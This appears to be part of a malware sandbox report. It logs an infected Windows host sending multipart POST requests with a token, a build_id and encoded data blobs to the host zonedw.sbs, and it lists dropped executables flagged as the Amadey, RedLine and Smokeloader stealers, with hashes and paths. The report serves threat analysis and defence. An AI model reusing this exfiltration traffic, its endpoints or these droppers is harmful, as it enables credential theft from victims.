                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                89192.168.2.450509116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:41 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----L6XBI5FCBIEUAIEK6PPP
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 453
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:41 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------L6XBI5FCBIEUAIEK6PPPContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------L6XBI5FCBIEUAIEK6PPPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------L6XBI5FCBIEUAIEK6PPPCont
                                                                                                                                                                                                                                                2024-12-13 12:55:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:42 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                90192.168.2.450518116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:44 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----2DBI5PPH4EUAIMOHVK6F
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 98801
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:44 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 42 49 35 50 50 48 34 45 55 41 49 4d 4f 48 56 4b 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 32 44 42 49 35 50 50 48 34 45 55 41 49 4d 4f 48 56 4b 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 32 44 42 49 35 50 50 48 34 45 55 41 49 4d 4f 48 56 4b 36 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------2DBI5PPH4EUAIMOHVK6FContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------2DBI5PPH4EUAIMOHVK6FContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------2DBI5PPH4EUAIMOHVK6FCont
                                                                                                                                                                                                                                                2024-12-13 12:55:44 UTC16355OUTData Raw: 6d 57 45 4d 38 52 47 50 4c 4c 45 74 74 2f 44 4f 50 77 71 75 2f 39 64 78 64 6b 5a 76 6a 36 32 53 37 6a 38 50 57 38 6a 79 6f 6b 6d 73 77 71 57 68 6c 61 4e 78 38 72 39 47 55 67 67 2b 34 4e 62 4f 6e 65 48 72 58 54 4c 6e 37 52 44 64 61 6e 4b 32 30 72 74 75 64 52 6e 6e 58 2f 41 4c 35 64 79 4d 2b 2b 4b 6e 31 50 53 4c 66 56 6d 73 57 6e 65 56 54 5a 58 53 58 55 66 6c 6b 44 4c 71 43 41 44 6b 48 6a 6b 2b 6c 58 36 53 30 58 7a 2f 52 44 65 72 2b 58 36 73 38 32 76 30 38 7a 34 58 65 4b 6b 79 56 33 58 39 36 4d 6a 71 50 39 4a 61 74 72 78 7a 62 4e 62 65 43 45 73 4c 4b 4f 4e 59 44 50 61 32 7a 52 73 35 6a 54 79 6a 4b 69 6c 53 77 42 32 71 52 77 54 67 38 45 38 47 74 53 54 77 76 5a 53 36 46 66 36 51 30 74 78 39 6e 76 5a 70 5a 70 47 44 4c 76 44 53 4f 58 4f 44 6a 47 4d 6e 6a 67 38
                                                                                                                                                                                                                                                Data Ascii: mWEM8RGPLLEtt/DOPwqu/9dxdkZvj62S7j8PW8jyokmswqWhlaNx8r9GUgg+4NbOneHrXTLn7RDdanK20rtudRnnX/AL5dyM++Kn1PSLfVmsWneVTZXSXUflkDLqCADkHjk+lX6S0Xz/RDer+X6s82v08z4XeKkyV3X96MjqP9JatrxzbNbeCEsLKONYDPa2zRs5jTyjKilSwB2qRwTg8E8GtSTwvZS6Ff6Q0tx9nvZpZpGDLvDSOXODjGMnjg8
                                                                                                                                                                                                                                                2024-12-13 12:55:44 UTC16355OUTData Raw: 6d 35 6e 4d 70 6b 73 62 32 46 5a 58 4a 2b 63 2f 4a 74 48 50 4f 64 71 48 72 7a 78 54 53 76 2f 41 46 36 2f 35 41 39 50 36 39 50 38 7a 31 43 69 76 4e 6f 37 4d 2b 49 49 50 46 64 74 59 33 6c 70 75 62 58 31 32 78 7a 74 6d 47 35 4d 63 55 52 61 46 38 63 6c 54 74 49 4f 4d 39 44 77 52 6b 56 51 76 37 69 4b 54 53 62 58 54 74 50 30 57 7a 30 75 33 2f 74 37 37 4a 71 6c 6d 4c 6e 79 37 57 52 78 48 6b 4c 35 69 49 66 33 62 34 6a 42 47 77 5a 50 79 6b 44 4a 79 6c 71 6c 35 32 2f 47 33 2b 59 33 70 66 79 76 2b 46 2f 38 6a 31 69 73 69 2b 31 76 37 48 34 6c 30 6e 52 2f 73 2b 2f 2b 30 45 6e 66 7a 64 2b 50 4c 38 73 4b 65 6d 4f 63 37 76 55 59 78 58 43 36 6c 5a 36 68 6f 47 6b 61 79 50 38 41 69 58 36 54 70 73 38 39 6b 4a 4c 54 54 62 74 33 46 70 47 30 6d 32 61 54 37 69 65 57 47 58 48 51
                                                                                                                                                                                                                                                Data Ascii: m5nMpksb2FZXJ+c/JtHPOdqHrzxTSv/AF6/5A9P69P8z1CivNo7M+IIPFdtY3lpubX12xztmG5McURaF8clTtIOM9DwRkVQv7iKTSbXTtP0Wz0u3/t77JqlmLny7WRxHkL5iIf3b4jBGwZPykDJylql52/G3+Y3pfyv+F/8j1isi+1v7H4l0nR/s+/+0Enfzd+PL8sKemOc7vUYxXC6lZ6hoGkayP8AiX6Tps89kJLTTbt3FpG0m2aT7ieWGXHQ
                                                                                                                                                                                                                                                2024-12-13 12:55:44 UTC16355OUTData Raw: 56 32 77 30 50 37 44 71 45 64 31 39 6f 33 37 4c 43 4b 79 32 37 4d 5a 32 45 6e 64 6e 50 66 50 54 39 61 58 58 2b 76 50 2f 41 49 41 33 74 70 2f 57 33 2f 42 4b 74 72 34 6f 2b 30 36 64 34 66 75 2f 73 5a 58 2b 32 44 6a 59 4a 4d 2b 56 2b 36 65 54 30 2b 62 37 6d 4f 33 57 70 50 44 4f 76 58 50 69 47 7a 2b 33 47 30 74 59 72 4b 56 64 30 44 77 33 6e 6e 50 31 35 57 52 64 67 43 4f 4f 4d 67 46 73 48 49 7a 78 57 66 5a 2b 44 37 36 31 6c 30 6d 4e 74 62 44 32 57 6b 53 4f 31 70 43 74 6f 46 59 71 59 33 51 43 52 74 78 33 46 51 34 77 51 46 48 42 79 44 6b 45 58 39 47 30 43 34 73 4e 57 75 39 56 76 72 75 32 6e 76 4c 6d 4a 49 70 47 74 62 51 32 36 75 46 7a 68 6e 47 39 74 7a 38 34 7a 6b 59 48 41 46 56 70 63 4a 65 51 6b 66 69 47 65 34 38 53 58 6d 6d 57 39 70 62 47 43 78 5a 56 75 5a 4a
                                                                                                                                                                                                                                                Data Ascii: V2w0P7DqEd19o37LCKy27MZ2EndnPfPT9aXX+vP/AIA3tp/W3/BKtr4o+06d4fu/sZX+2DjYJM+V+6eT0+b7mO3WpPDOvXPiGz+3G0tYrKVd0Dw3nnP15WRdgCOOMgFsHIzxWfZ+D761l0mNtbD2WkSO1pCtoFYqY3QCRtx3FQ4wQFHByDkEX9G0C4sNWu9Vvru2nvLmJIpGtbQ26uFzhnG9tz84zkYHAFVpcJeQkfiGe48SXmmW9pbGCxZVuZJ
                                                                                                                                                                                                                                                2024-12-13 12:55:44 UTC16355OUTData Raw: 48 59 75 70 57 4d 4d 77 33 5a 51 35 78 67 37 4d 45 38 43 6d 31 62 2b 76 36 2f 72 75 4a 61 6f 33 62 6a 56 39 4d 73 37 64 4c 69 36 31 47 30 67 67 6b 54 7a 45 6c 6c 6e 56 56 5a 4f 50 6d 42 4a 77 52 79 4f 66 63 56 5a 74 37 69 47 37 74 34 37 69 32 6d 6a 6d 67 6b 55 4d 6b 6b 62 42 6c 59 48 6f 51 52 77 52 58 45 61 50 6f 73 38 57 70 65 48 35 4c 6a 54 32 53 4b 47 54 55 4c 69 4a 47 6a 79 4c 56 5a 48 42 6a 55 34 34 56 74 72 45 59 37 63 6a 74 57 31 34 51 74 37 69 7a 30 4b 34 68 6c 74 33 68 4b 58 31 32 59 6f 33 54 5a 38 68 6d 63 72 67 65 68 42 47 50 59 30 67 4e 4f 31 31 72 53 72 36 39 6d 73 72 54 55 37 4b 34 75 34 63 2b 62 42 44 63 4b 37 78 34 4f 44 75 55 48 49 77 65 4f 61 6c 76 74 51 73 74 4d 74 54 63 36 68 65 57 39 70 62 71 51 44 4c 63 53 72 47 67 4a 36 63 6b 34 72
                                                                                                                                                                                                                                                Data Ascii: HYupWMMw3ZQ5xg7ME8Cm1b+v6/ruJao3bjV9Ms7dLi61G0ggkTzEllnVVZOPmBJwRyOfcVZt7iG7t47i2mjmgkUMkkbBlYHoQRwRXEaPos8WpeH5LjT2SKGTULiJGjyLVZHBjU44VtrEY7cjtW14Qt7iz0K4hlt3hKX12Yo3TZ8hmcrgehBGPY0gNO11rSr69msrTU7K4u4c+bBDcK7x4ODuUHIweOalvtQstMtTc6heW9pbqQDLcSrGgJ6ck4r
                                                                                                                                                                                                                                                2024-12-13 12:55:44 UTC16355OUTData Raw: 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52
                                                                                                                                                                                                                                                Data Ascii: RQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABR
                                                                                                                                                                                                                                                2024-12-13 12:55:44 UTC671OUTData Raw: 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b
                                                                                                                                                                                                                                                Data Ascii: ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
                                                                                                                                                                                                                                                2024-12-13 12:55:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                91192.168.2.450520116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:47 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----YU3OPPZC2VAIM790RI5P
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------YU3OPPZC2VAIM790RI5PContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------YU3OPPZC2VAIM790RI5PContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------YU3OPPZC2VAIM790RI5PCont
                                                                                                                                                                                                                                                2024-12-13 12:55:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:48 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                92192.168.2.450521116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:50 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----S00Z58G4WTRQQIEKNO8Y
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 53 30 30 5a 35 38 47 34 57 54 52 51 51 49 45 4b 4e 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 53 30 30 5a 35 38 47 34 57 54 52 51 51 49 45 4b 4e 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 53 30 30 5a 35 38 47 34 57 54 52 51 51 49 45 4b 4e 4f 38 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------S00Z58G4WTRQQIEKNO8YContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------S00Z58G4WTRQQIEKNO8YContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------S00Z58G4WTRQQIEKNO8YCont
                                                                                                                                                                                                                                                2024-12-13 12:55:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:07:51:09
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                Imagebase:0xf30000
                                                                                                                                                                                                                                                File size:3'223'040 bytes
                                                                                                                                                                                                                                                MD5 hash:197F7A10814E446EE3D649F2509B1608
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                Start time:07:51:12
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                Imagebase:0x90000
                                                                                                                                                                                                                                                File size:3'223'040 bytes
                                                                                                                                                                                                                                                MD5 hash:197F7A10814E446EE3D649F2509B1608
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:07:51:12
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Imagebase:0x90000
                                                                                                                                                                                                                                                File size:3'223'040 bytes
                                                                                                                                                                                                                                                MD5 hash:197F7A10814E446EE3D649F2509B1608
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                Start time:07:52:00
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Imagebase:0x90000
                                                                                                                                                                                                                                                File size:3'223'040 bytes
                                                                                                                                                                                                                                                MD5 hash:197F7A10814E446EE3D649F2509B1608
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                Start time:07:52:11
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:393'728 bytes
                                                                                                                                                                                                                                                MD5 hash:DFD5F78A711FA92337010ECC028470B4
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.3467949827.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 67%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                Start time:07:52:20
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe"
                                                                                                                                                                                                                                                Imagebase:0xcd0000
                                                                                                                                                                                                                                                File size:2'660'864 bytes
                                                                                                                                                                                                                                                MD5 hash:2A78CE9F3872F5E591D643459CABE476
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
